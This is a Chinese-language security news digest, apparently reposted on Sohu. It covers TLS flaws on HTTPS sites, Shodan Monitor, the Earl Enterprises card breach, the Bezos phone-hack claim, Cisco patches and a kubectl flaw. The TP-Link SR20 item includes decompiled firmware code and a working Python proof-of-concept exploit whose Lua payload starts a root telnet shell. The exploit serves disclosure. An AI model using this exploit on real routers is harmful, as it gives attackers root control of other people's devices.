新发现的HTTPS漏洞可能会使您的数据暴露在外

意大利威尼斯CA’Foscari大学和奥地利Tu Wien大学的研究人员发现,超过10000个使用HTTPS的顶级网站仍然容易受到传输层安全漏洞的攻击。

HTTPS(超文本传输协议安全)在几年前取代了HTTP,目前大多数顶级网站都在使用它,但是发现它仍然不安全。 HTTPS应该保护用户免受中间人攻击,并且不允许黑客访问您的密码,历史记录和其他数据。

当用户访问这些网站时,HTTPS的绿色挂锁锁仍然会出现在地址栏中。TLS中的错误很难被检测到,但它们仍然存在,攻击者可以使用这些漏洞来解密来自cookie的信息。虽然cookie不会向攻击者提供任何敏感信息,但还有其他缺陷。攻击者可以访问浏览器和服务器之间交换的几乎所有数据。(内容来源:FreeBuf)

Shodan 推出新服务 Monitor,专门追踪暴露的系统

物联网搜索引擎 Shodan 本周宣布推出新服务 Monitor,旨在帮助组织机构追踪连接到互联网的系统。

Shodan Monitor 允许组织机构获得对暴露在互联网上的系统的完整可见性。用户可在检测到新设备的情况下启动扫描并配置实时通知。

Shodan 表示,新服务 Monitor 可扩展性高,使得用户能够在任何地方监控1到100万个 IP 地址。该公司表示,“Shodan 平台的目的是在不费力的情况下处理所有规模的网。”

用户不仅能够监控本地网络中的设备,还能监控所有的联网系统。这对于检测被暴露的数据库、钓鱼站点和与数据泄露而言作用非常大。

Shodan 对现有客户免费,用户可通过 Shodan API 和命令行接口使用这些功能。

Shodan 指出,谷歌推出的能够分析运行时性能数据的Chrome DevTools 工具对 Monitor 的性能评分很高。(内容来源:360代码卫士)

Earl Enterprise 餐馆系统遭黑客入侵 200 多万张信用卡资料遭窃取

据外媒The Verge报道, Planet Hollywood、Buca di Beppo和Mixology等餐厅的母公司证实,该公司遭遇了安全漏洞的影响。 此前安全研究人员发现该公司客户的200多万张信用卡资料遭窃取,黑客还在网上叫卖窃取的信用卡信息。

KrebsOnSecurity安全研究人员表示,在其发现“有力证据”表明客户的信用卡和借记卡号码正在网上销售后,于2月份联系了该公司。黑客使用“在其销售点系统上安装的恶意软件”从210个州的餐馆位置窃取了215万个信用卡和借记卡号码,到期日期以及一些持卡人姓名。

Earl Enterprises表示,入侵事件发生在2018年5月23日和2019年3月18日之间,并且“事件现已被控制。”这次入侵事件影响了 Buca di Beppo、 Earl of Sandwich、 Planet Hollywood、 Chicken Guy!、 Mixology和Tequila Taqueria等餐厅。

该公司已经为客户推出了一个网站,以检查他们去过的餐厅是否是受影响的餐厅之一。该公司还表示,在线订单不会受到入侵的影响。

该公司还建议客户检查他们是否遭遇可疑活动,并在发现欺诈性交易时通知相关银行。(内容来源:HackerNews)

TP-Link SR20路由器0 day漏洞

Google安全开发人员Matthew Garrett发现TP-Link SR20智能家庭路由器存在0 day任意代码执行漏洞,处于同一网络的攻击者可以利用漏洞以root权限执行任意命令。

Garrett称公开漏洞是由于自他将漏洞报告给TP-link已经90天了,而TP-link尚未修复给漏洞,且没有给出回应。

TP-Link SR20路由器融合了Zigbee/ZWave hub和路由器的功能,提供一个触摸屏用于配置和控制。固件二进制文件参见。研究人员分析固件发现一个名为tddp的可执行文件。运行arm-linux-gnu-nm -D发现它会导入popen(),因为popen()会将参数直接传递给shell,所以如果可以将用户控制的输入传给popen()调用,也就可以实现攻击利用。

Tddp是TP-Link Device Debug Protocol(设备调试协议),运行在大多数的TP-Link设备上,但在不同的设备上却有不同的功能。最常见的就是协议,有趣的是该协议的v2版本是需要认证的,还需要知道路由器的admin密码,而v1版本是非认证的。

将tddp复制到Ghidra中进行分析后,研究人员发现了一个名为recvfrom()的函数,它会从网络socket中复制信息。它会查看packet中的第一个字节,并用来决定使用的是哪种协议,并根据协议的版本确定要将packet传递给哪个dispatcher。在v1版本中,dispatcher会查看packet的第二个字节,并根据其中的值调用不同的函数,0x31就是CMD_FTEST_CONFIG。

研究人员对该函数进行了反编译:

int ftest_config(char *byte) {

int lua_State;

char *remote_address;

int err;

int luaerr;

char filename[64]

char configFile[64];

char luaFile[64];

int attempts;

char *payload;

attempts = 4;

memset(luaFile,0,0x40);

memset(configFile,0,0x40);

memset(filename,0,0x40);

lua_State = luaL_newstart();

payload = iParm1 + 0xb027;

if (payload != 0x00) {

sscanf(payload,"%[^;];%s",luaFile,configFile);

if ((luaFile[0] == 0) || (configFile[0] == 0)) {

printf("[%s():%d] luaFile or configFile len error.n","tddp_cmd_configSet",0x22b);

else {

remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));

tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);

sprintf(filename,"/tmp/%s",luaFile);

while (0 < attempts) {

sleep(1);

err = access(filename,0);

if (err == 0) break;

attempts = attempts + -1;

if (attempts == 0) {

printf("[%s():%d] lua file [%s] don't exsit.n","tddp_cmd_configSet",0x23e,filename);

else {

if (lua_State != 0) {

luaL_openlibs(lua_State);

luaerr = luaL_loadfile(lua_State,filename);

if (luaerr == 0) {

luaerr = lua_pcall(lua_State,0,0xffffffff,0);

lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);

lua_pushstring(lua_State,configFile);

lua_pushstring(lua_State,remote_address);

lua_call(lua_State,2,1);

lua_close(lua_State);

可以看出该函数会将对含有两个用;隔开的字符串的payload的packet进行分析。第一个字符串是文件名,第二个是配置文件。然后调用tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address),它会在后台执行tftp命令。然后连接回发送该命令的机器,并尝试通过tftp协议下载与发送的文件名对应的文件。

主tddp进程会回等待4秒钟的时间来等候文件出现,一旦出现就将文件加载到LUA翻译器中,然后用配置文件名和远程地址作为参数调用config_test()。因为config_test()是从远程机器下载的文件提供的,因此在翻译器中可以执行任意代码,包括在主机上运行命令的os.execute方法。因为tddp是以root权限运行的,所以攻击者也可以以root权限执行任意命令。

PoC代码如下:

#!/usr/bin/python3

# SPDX-License-Identifier: Apache-2.0

# Create a file in your tftp directory with the following contents:

#function config_test(config)

# os.execute("telnetd -l /bin/login.sh")

# Execute as poc.py remoteaddr filename

import binascii

import socket

port_send = 1040

port_receive = 61000

tddp_ver = "01"

tddp_command = "31"

tddp_req = "01"

tddp_reply = "00"

tddp_padding = "%0.16X" % 00

tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])

sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

sock_receive.bind(('', port_receive))

# Send a request

sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

packet = binascii.unhexlify(tddp_packet)

argument = "%s;arbitrary" % sys.argv[2]

packet = packet + argument.encode()

sock_send.sendto(packet, (sys.argv[1], port_send))

sock_send.close()

response, addr = sock_receive.recvfrom(1024)

r = response.encode('hex')

print(r)

(内容来源:嘶吼)

沙特政府从亚马逊CEO贝索斯手机获取到个人数据

新浪科技讯北京时间3月31下午消息,据CNBC报道,安全主管加文·德贝克尔在周六表示,沙特政府黑入了亚马逊首席执行官杰夫·贝索斯的手机并获取到了个人数据。

贝索斯先前曾要求德贝克尔调查《国家问讯报》是如何获取到其与电视主持人劳伦·桑切斯发送的私密信息一事。

在二月被曝出的新闻中,贝索斯指控这家小报的母公司AMI曾试图敲诈他,威胁其如果不公开声明这家小报的报道无任何政治动机,便会将这些不雅照片公之于众。AMI坚持表示,自己的报道均是合法的。

德贝克尔表示自己在完成调查之后,非常确信“沙特曾经黑入贝索斯的手机并获取了个人信息”。贝索斯也是《华盛顿邮报》的老板。一直以来,《华盛顿邮报》对于特朗普政府以及沙特政府的报道大多是负面信息。十月,《华盛顿邮报》的记者贾马尔•卡舒吉(Jamal Khashoggi)在沙特领事馆被杀,此举在全球范围内引发公众的愤慨。

“一些美国人也许会对此感到很惊讶,事实上沙特政府从去年十月开始便一直试图对杰夫·贝索斯不利,当时《华盛顿邮报》报道了卡舒吉被残酷迫害一事。”

德贝克尔之后表示,目前尚不清楚AMI是否知道其中详情,但他指出AMI董事长戴维·佩克尔与沙特政府关系密切。

沙特方之前回应,自己与《国家问讯报》报道贝索斯一事毫无任何关系。德贝克尔表示自己已经将调查结果交给了联邦官员。

沙特大使馆以及AMI尚未回应置评请求。(内容来源:新浪科技)

思科释出大量补丁,修复IOS XE和小型企业路由漏洞

周三,思科系统公司发布了26个补丁,包括其IOS XE操作系统和两个小型企业RV320和RV325路由器中的漏洞修复。共有19个漏洞被思科评为严重级别,其他漏洞被评为中等级别。

在高严重性漏洞中,15个与思科的互联网操作系统(IOS)XE相关,后者运行在思科网络设备上,如交换机、控制器和路由器。漏洞类型包括权限提升、注入和拒绝服务漏洞。

思科还发布了其他四个漏洞的信息,包括:Moodle mybackpack功能服务器端请求伪造漏洞(CVE-2019-3809),可能允许未经身份验证的远程攻击者对目标系统进行服务器端请求伪造攻击;在Elastic Kibana安全审计记录器中发现了第二个严重漏洞,可能导致任意代码执行(CVE-2019-7610);Python urllib安全绕过漏洞(CVE-2019-9948);Elastic Kibana Timelion Visualizer任意代码执行漏洞(CVE-2019-7609)。(内容来源:FreeBuf)

Kubernetes Kubectl CLI工具曝出“数据删除”漏洞

Kubernetes社区在Kubernetes平台的一个组件中发现了一个“高危”安全漏洞,可能会删掉用户工作站上的文件。就在曝出这个最新的安全问题之前,最新版Kubernetes刚刚发布,该平台去年年底传出了第一个重大的安全漏洞。

最新的漏洞名为CVE-2019-1002101,影响Kubernetes kubectl cp命令。如果受到攻击,该漏洞可能让攻击者得以将文件写入到用户计算机上的任何路径。

Kubectl是一个命令行接口(CLI),用于针对Kubernetes集群运行命令。它基本上允许在容器和用户的机器之间拷贝文件。

Twistlock的安全研究人员Ariel Zelivansky本月早些时候发现了这个最新的安全问题。他解释道,新漏洞与去年发布的一个补丁有关。 返回搜狐,查看更多

责任编辑:

声明:该文观点仅代表作者本人,搜狐号系信息发布平台,搜狐仅提供信息存储空间服务。